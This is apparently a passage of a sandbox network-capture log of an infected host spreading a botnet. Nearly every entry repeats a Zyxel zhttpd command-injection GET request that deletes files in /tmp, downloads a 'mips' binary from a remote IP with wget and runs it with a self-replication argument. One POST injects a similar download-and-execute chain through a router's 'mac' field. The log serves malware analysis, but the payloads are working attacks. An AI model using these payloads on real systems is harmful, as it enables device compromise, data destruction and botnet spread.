                              Mar 31, 2024 08:42:02.268933058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8149192.168.2.1339558133.73.254.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.268960953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8150192.168.2.1349272209.215.129.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.269027948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8151192.168.2.1358840125.83.172.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.269088984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8152192.168.2.1333394155.106.113.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.269134045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8153192.168.2.1335704217.16.121.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.269166946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8154192.168.2.1347914159.98.109.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.269233942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8155192.168.2.1342326116.23.22.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.269265890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8156192.168.2.1340844219.104.123.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.269342899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8157192.168.2.134421424.212.78.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.269390106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8158192.168.2.1344272209.241.78.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.269412994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8159192.168.2.1350978130.1.21.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.269480944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8160192.168.2.1344878137.185.206.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.269545078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8161192.168.2.1333852101.143.65.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.269599915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8162192.168.2.134750291.39.169.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.269658089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8163192.168.2.1335110186.169.89.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.269711018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8164192.168.2.1355648126.241.88.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.269764900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8165192.168.2.1356726155.121.185.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.269818068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8166192.168.2.133521848.115.41.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.269879103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8167192.168.2.1342382190.172.173.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.269921064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8168192.168.2.1340596104.37.29.2308080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.200021029 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:42:03.369245052 CEST175INHTTP/1.1 400 Bad Request: missing required Host header
                              Content-Type: text/plain; charset=utf-8
                              Connection: close
                              Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3a 20 6d 69 73 73 69 6e 67 20 72 65 71 75 69 72 65 64 20 48 6f 73 74 20 68 65 61 64 65 72
                              Data Ascii: 400 Bad Request: missing required Host header


                              Session IDSource IPSource PortDestination IPDestination Port
                              8169192.168.2.1344564152.142.222.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.298629045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8170192.168.2.1332858153.204.200.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.298665047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8171192.168.2.133294092.120.98.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.298712969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8172192.168.2.1348894216.225.85.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.298759937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8173192.168.2.1340174195.81.3.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.298789024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8174192.168.2.134682023.177.171.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.298825026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8175192.168.2.135822867.156.170.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.298882008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8176192.168.2.1355902179.113.131.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.298897028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8177192.168.2.133287076.43.137.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.298959970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8178192.168.2.1348016148.19.93.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.299015045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8179192.168.2.1357992142.50.127.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.299088001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8180192.168.2.135989051.29.122.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.299113035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8181192.168.2.1347308115.102.253.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.299170971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8182192.168.2.1359154125.229.84.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.299216986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8183192.168.2.1359164108.210.91.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.299253941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8184192.168.2.13543682.137.245.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.299283981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8185192.168.2.133893438.93.48.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.299335003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8186192.168.2.133440879.155.191.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.299398899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8187192.168.2.135304875.179.107.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.299460888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8188192.168.2.135535281.190.36.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.299470901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8189192.168.2.134248286.57.135.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.299495935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8190192.168.2.1351752153.76.251.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.299601078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8191192.168.2.1359754137.249.202.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.299628973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8192192.168.2.135629424.148.130.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.299698114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8193192.168.2.134960897.163.121.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.299757957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8194192.168.2.1344116210.66.168.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.299787045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8195192.168.2.1348982217.193.46.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.299837112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8196192.168.2.1336816177.54.120.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.299922943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8197192.168.2.134004863.111.54.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.299959898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8198192.168.2.1332962197.205.54.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.300025940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8199192.168.2.1348078198.166.36.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.300080061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8200192.168.2.134837013.40.243.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.300154924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8201192.168.2.135537898.236.122.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.300177097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8202192.168.2.1351124209.66.5.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.300240993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8203192.168.2.135266832.138.227.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.300249100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8204192.168.2.1360740174.44.46.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.300276041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8205192.168.2.133595820.55.142.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.300328016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8206192.168.2.1334686168.45.40.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.300365925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8207192.168.2.1346484157.209.4.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.300429106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8208192.168.2.1333488174.21.132.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.300467968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8209192.168.2.134390093.102.197.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.300518990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8210192.168.2.135972637.225.235.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.300570011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8211192.168.2.1348380223.59.163.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.300631046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8212192.168.2.1333620143.152.179.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.300683975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8213192.168.2.1343080100.45.197.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.300734043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8214192.168.2.135570427.77.221.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.300779104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8215192.168.2.134036223.132.51.33443
                              TimestampBytes transferredDirectionData
